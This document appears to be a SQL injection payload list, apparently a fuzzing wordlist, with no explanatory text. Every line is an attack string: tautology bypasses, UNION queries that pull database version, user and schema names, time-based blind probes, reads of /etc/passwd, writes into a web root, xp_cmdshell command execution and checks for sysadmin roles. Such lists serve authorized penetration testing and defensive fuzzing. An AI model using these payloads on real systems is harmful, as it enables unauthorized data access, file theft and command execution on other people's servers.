AND substring((SELECT @@version),1,1) = '5'
' OR 1=1 --
" OR 1=1 --
') OR 1=1 --
" AND 1=1 --
') AND 1=1 --
' AND 1=1 --
" OR '1'='1
') OR '1'='1
') AND '1'='1
' AND '1'='1
" AND "1"="1
') AND "1"="1
' OR "1"="1
") OR "1"="1
' UNION SELECT 1,2,3 --
") UNION SELECT 1,2,3 --
' UNION ALL SELECT 1,2,3 --
") UNION ALL SELECT 1,2,3 --
' UNION SELECT NULL,NULL,NULL WHERE 1=1 --
") UNION SELECT NULL,NULL,NULL WHERE 1=1 --
' UNION SELECT NULL,NULL,NULL WHERE 1=2 --
") UNION SELECT NULL,NULL,NULL WHERE 1=2 --
' WAITFOR DELAY '0:0:5' --
") WAITFOR DELAY '0:0:5' --
' SLEEP(5) --
") SLEEP(5) --
' BENCHMARK(1000000,MD5(1)) --
") BENCHMARK(1000000,MD5(1)) --
' IF(1=1,SLEEP(5),0) --
") IF(1=1,SLEEP(5),0) --
' IF(1=1,BENCHMARK(1000000,MD5(1)),0) --
") IF(1=1,BENCHMARK(1000000,MD5(1)),0) --
' INTO OUTFILE '/var/www/html/test.txt' --
") INTO OUTFILE '/var/www/html/test.txt' --
' LOAD_FILE('/etc/passwd') --
") LOAD_FILE('/etc/passwd') --
' EXEC xp_cmdshell 'cmd.exe /c dir' --
") EXEC xp_cmdshell 'cmd.exe /c dir' --
' UNION SELECT @@version,2,3 --
") UNION SELECT @@version,2,3 --
' UNION SELECT user(),2,3 --
") UNION SELECT user(),2,3 --
' UNION SELECT database(),2,3 --
") UNION SELECT database(),2,3 --
' UNION SELECT SCHEMA_NAME(database_id()),2,3 --
") UNION SELECT SCHEMA_NAME(database_id()),2,3 --
' UNION SELECT CURRENT_USER,2,3 --
") UNION SELECT CURRENT_USER,2,3 --
' UNION SELECT SYSTEM_USER,2,3 --
") UNION SELECT SYSTEM_USER,2,3 --
' UNION SELECT USER_NAME(),2,3 --
") UNION SELECT USER_NAME(),2,3 --
' UNION SELECT ORIGINAL_DB_NAME(),2,3 --
") UNION SELECT ORIGINAL_DB_NAME(),2,3 --
' UNION SELECT SESSION_USER,2,3 --
") UNION SELECT SESSION_USER,2,3 --
' UNION SELECT SUSER_SNAME(),2,3 --
") UNION SELECT SUSER_SNAME(),2,3 --
' UNION SELECT IS_MEMBER('db_owner'),2,3 --
") UNION SELECT IS_MEMBER('db_owner'),2,3 --
' UNION SELECT IS_SRVROLEMEMBER('sysadmin'),2,3 --
") UNION SELECT IS_SRVROLEMEMBER('sysadmin'),2,3 --
' UNION SELECT IS_MEMBER('sysadmin'),2,3 --
") UNION SELECT IS_MEMBER('sysadmin'),2,3 --
' UNION SELECT IS_MEMBER('securityadmin'),2,3 --
") UNION SELECT IS_MEMBER('securityadmin'),2,3 --
' UNION SELECT IS_MEMBER('serveradmin'),2,3 --
